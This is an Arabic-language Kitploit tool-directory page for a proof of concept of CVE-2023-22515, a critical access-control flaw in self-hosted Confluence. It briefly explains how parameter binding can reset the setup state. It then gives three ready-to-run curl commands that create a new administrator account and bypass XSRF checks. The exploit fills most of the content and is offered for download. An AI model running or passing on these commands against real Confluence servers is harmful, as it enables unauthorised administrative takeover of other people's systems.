Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-22515-POC — Poc لـ CVE-2023-22515 | Kitploit
أدوات/GitHubGitHub/j3seer/cve-2023-22515-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالفريق الأحمر
GitHubj3seer/cve-2023-22515-poc

CVE-2023-22515-POC

Poc لـ CVE-2023-22515

عرض المستودع
82منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-22515

CVE-2023-22515، ثغرة أمنية حرجة تؤثر على الإصدارات المحلية من Confluence Server وConfluence Data Center، وهي ثغرة في التحكم في الوصول المكسور. قدمت Atlassian درجة أساسية من CVSS تبلغ 10.0

الاستغلال

شرح مختصر:

1- نظرًا لكيفية قيام معترضات Xwork بتحليل المعاملات /test.action?one=a يساوي setOne()='a' وبدلاً من ذلك /test.action?one.two=a يساوي getOne().setTwo()="a"

2- تشمل نقاط النهاية /setup/* استدعاء @ParameterSafe والذي يسمح لنا باستخدام set و get مثل /setup/setupdb.action?dbConfigInfo.databaseType=postgresql، ولكن نظرًا لأن نقاط النهاية /setup/* محظورة لأن الإعداد مكتمل، يمكن استخدام /server-info.action

3- ابحث عن طريقة set لإكمال الإعداد => getBootstrapStatusProvider().getApplicationConfig().setSetupComplete(false);

4- استخدم رأس "X-Atlassian-Token" لتجاوز XSRF

root@kitploit:~
curl http://localhost/server-info.action\?bootstrapStatusProvider.applicationConfig.setupComplete\=false\; 

curl -X POST -H "X-Atlassian-Token: no-check" -d "username=haxor&fullName=leet&[email protected]&password=leet&confirm=leet&setup-next-button=Next" http://localhost/setup/setupadministrator.action\; 

curl -X POST -H "X-Atlassian-Token: no-check" http://localhost/setup/finishsetup.action

المراجع

إخلاء مسؤولية: لم يتم اكتشاف أو صنع الاستغلال بواسطتي، يعود الفضل للمقالات أدناه.

https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis

https://blog.s1r1us.ninja/research/brokenconflu

تنزيل الأداة